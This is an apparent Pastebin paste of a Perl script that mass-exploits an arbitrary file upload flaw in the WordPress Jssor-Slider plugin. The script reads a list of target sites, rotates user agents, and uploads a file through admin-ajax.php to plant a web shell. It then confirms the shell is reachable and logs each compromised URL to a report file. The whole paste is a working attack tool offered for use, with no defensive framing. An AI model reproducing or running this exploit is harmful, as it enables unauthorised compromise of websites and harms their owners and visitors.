Advertisement
Guest User

WordPress Jssor-Slider Library Plugin Arbitrary Exploiter

a guest
Jul 24th, 2019
114
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 3.12 KB | None | 0 0
  1. #!/usr/bin/perl
  2. use LWP::UserAgent;
  3.  
  4. my $datestring = localtime();
  5. ($sec,$min,$hour,$mday,$mon,$year,$wday,$yday,$isdst) = localtime();
  6.  
  7. sub randomagent {
  8. my @array = ('Mozilla/5.0 (Windows NT 5.1; rv:31.0) Gecko/20100101 Firefox/31.0',
  9. 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20120101 Firefox/29.0',
  10. 'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)',
  11. 'Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36',
  12. 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36',
  13. 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.63 Safari/537.31'
  14. );
  15. my $random = $array[rand @array];
  16. return($random);
  17. }
  18. flag();
  19. print "[+] Input List Target : ";
  20. chomp (my $list=<>);
  21. print "[+] Input File : ";
  22. chomp (my $file=<>);
  23. print "[+] Started : $datestring\n";
  24. open(my $arq,'<'.$list) || die($!);
  25. my @site = <$arq>;
  26. @site = grep { !/^$/ } @site;
  27. close($arq);
  28. print "[".($#site+1)."] URL to test upload\n\n";
  29. my $i;
  30. foreach my $web(@site){$i++;
  31. chomp($web);
  32. if($web !~ /^(http|https):\/\//){
  33. $web = 'http://'.$web;
  34. }
  35. print "[$i] $web \n";
  36. print "Check Shell: $web/wp-content/jssor-slider/jssor-uploads/".$file."\n";
  37. expqq($web);#exploiting website :)
  38. }
  39. sub expqq{
  40. my $useragent = randomagent();#Get a Random User Agent
  41. my $ua = LWP::UserAgent->new(ssl_opts => { verify_hostname => 0 });#Https websites accept
  42. $ua->timeout(10);
  43. $ua->agent($useragent);
  44. print "[Testing] Test Vuln \n";
  45. my $url = $_[0]."/wp-admin/admin-ajax.php?param=upload_slide&action=upload_library";
  46. my $ss = $_[0]."/wp-content/jssor-slider/jssor-uploads/".$file;
  47. my $response = $ua->get($url);
  48.  
  49. if ($response->is_success || $response->content=~/error/){
  50. print "[OK] Vuln\n";
  51. print "[*] Sent payload\n";
  52. my $regex = 'success';
  53. my $body = $ua->post( $url,
  54. Content_Type => 'form-data',
  55. Content => [ 'file' => ["$file"] ]
  56. );
  57. if ($body->is_success || $body->content=~ /$regex/){
  58. print "[+] Payload Berhasil executed\n";
  59.  
  60. print "[*] Check jika shell sudah terupload\n\n";
  61. my $res = $ua->get($ss);
  62. if ($res->is_success){
  63.  
  64. print "[OK] Shell Sukses diupload \n";
  65.  
  66. my $ee = $ua->get($_[0]."/wp-content/jssor-slider/jssor-uploads/$file");
  67. print "\n[*] Website Info :\n";
  68. print "| ".$_[0]."/wp-content/jssor-slider/jssor-uploads/$file\n\n";
  69. open(my $fh, '>>', 'report.txt');
  70. print $fh $_[0]."/wp-content/jssor-slider/jssor-uploads/$file\n";
  71. close $fh;
  72. print "[*] Berhasil disimpan report.txt\n\n";
  73.  
  74. }
  75. else {print "[No] Gagal Upload Shell \n\n";}
  76. }
  77. else {print "[No] Gagal Kirim Payload\n\n";}
  78. }
  79. else {print "[No] Gak Vuln\n\n";}
  80. }
  81. sub flag {print "\n[+] WordPress Jssor-Slider Library Plugin Arbitrary Exploiter \n[*] Coder => M-A | Recoded => Dx_Cyber\n(c) Janissaries.org, Sec4ever.com, Lokerilmu-it.blogspot.com\n\n";
  82. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement